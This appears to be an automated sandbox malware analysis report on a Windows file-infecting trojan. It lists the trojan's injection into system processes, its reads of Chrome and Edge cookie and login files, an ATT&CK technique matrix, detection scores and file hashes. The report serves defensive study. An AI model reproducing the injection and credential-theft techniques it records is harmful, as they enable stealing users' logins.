                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 5400Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31F7008Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_004587B1 LogonUserW
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00464C53 mouse_event
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe | Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                Source: C:\Windows\SysWOW64\choice.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: OVZizpEU7Q.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: OVZizpEU7Q.exe, CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_0042862B cpuid
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00441E06 GetUserNameW
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\choice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\choice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: OVZizpEU7Q.exe | Binary or memory string: WIN_81
                Source: OVZizpEU7Q.exe | Binary or memory string: WIN_XP
                Source: OVZizpEU7Q.exe | Binary or memory string: WIN_XPe
                Source: OVZizpEU7Q.exe | Binary or memory string: WIN_VISTA
                Source: OVZizpEU7Q.exe | Binary or memory string: WIN_7
                Source: OVZizpEU7Q.exe | Binary or memory string: WIN_8
                Source: OVZizpEU7Q.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                1
                Taint Shared Content
                1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Service Execution
                2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Windows Service
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS126
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                Software Packing
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Windows Service
                1
                Timestomp
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items312
                Process Injection
                1
                DLL Side-Loading
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Masquerading
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Valid Accounts
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                Virtualization/Sandbox Evasion
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
                Process Injection
                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                [Behavior graph: ID 1587962, Sample: OVZizpEU7Q.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                OVZizpEU7Q.exe | 74% | Virustotal | | Browse
                OVZizpEU7Q.exe | 87% | ReversingLabs | Win32.Virus.Expiro |
                OVZizpEU7Q.exe | 100% | Avira | W32/Infector.Gen |
                OVZizpEU7Q.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen |
                C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | |
                C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML | |

                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587962
Start date and time: 2025-01-10 19:49:51 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OVZizpEU7Q.exe (renamed because original name is a hash value)
Original Sample Name: 8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@8/6@18/14
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 61
• Number of non-executed functions: 249
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.190.159.73, 52.149.20.212
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
13:51:08  API Interceptor  1x Sleep call for process: OVZizpEU7Q.exe modified
13:52:22  API Interceptor  9620914x Sleep call for process: choice.exe modified
                                                                                      Message.emlGet hashmaliciousUnknownBrowse
                                                                                      • 34.249.87.52
                                                                                      frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 18.188.126.130
                                                                                      cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 108.138.26.73
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 3.130.71.34
                                                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                      • 108.138.26.78
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1658880
                                                                                      Entropy (8bit):4.313001536974501
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:cxGBcmlvVg9N9JMlDlfjRiVuVsWt5MJMs:YGy+dgFIDRRAubt5M
                                                                                      MD5:43F9E491CFEB42E75ED6C50912305629
                                                                                      SHA1:8EE292C9FA957F75A18982BDA23C37FFF139A026
                                                                                      SHA-256:840D8BA88C5E9EE536B06F18CAC34130194A364519E3B3CB274BC56338CC17A9
                                                                                      SHA-512:BED50B566BE0CEF57C0A5EBBA087877B607E61726F3ECEB8546AB14EADB02801803E91E866F414FC8F34816A29409BBED1AA764EF6BD15FE90080D8F7C7516A4
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      Process:C:\Windows\SysWOW64\choice.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.995563535963549
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:MPK+kRU42gRD/oqJDzLzPuj39xkyt2HNJnMmQEFBPIz1HcUnS2:MP7+UBeD/hs3Dkyt2HNJnhLgz1zf
                                                                                      MD5:6511CF77F2157C57B6B23F8A02E86041
                                                                                      SHA1:085352A9D0D342D44FF0ED7048294E2E0029C2F2
                                                                                      SHA-256:336C36FD60E9B7F20CBD93B1156768CFB53CAC9DE0F2620863493A4C86E6E63F
                                                                                      SHA-512:F2C45D643A325BB80DEC69E6F6B2BF2E6D01FA30773B4B978044143787807A408444706363B8232EA4C94A3BC3BCFFB56E2B86AD56EFDC66079DDC37FF323C60
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12320
                                                                                      Entropy (8bit):7.986399894518101
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:QtcLuEUmps/SUssnrht/iWzDT+GK+/1jHfhxyhx2WXVRtTCqfj30P/7xVyrR58Hi:QCSEz3snT/XHTKaj6TffLK7Qei
                                                                                      MD5:265F227113EF5E646CF72DD33E87EBED
                                                                                      SHA1:B3F657D038B12E29D611C8F2728720CC4DE74766
                                                                                      SHA-256:1B5F02F9177C98211A24D851C6F6414E6926B54D32E01CA1295A065E0514FC5B
                                                                                      SHA-512:B9CAD859F126415B272F4A73352C29DFC0571CF448DB65120FCA991C5E16109E39B13EC513B2E4A918C6556EE1410B41C3B0CDAFF0D85AFA282371C4695BDD36
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):1594368
                                                                                      Entropy (8bit):4.175693383978121
                                                                                      Encrypted:false
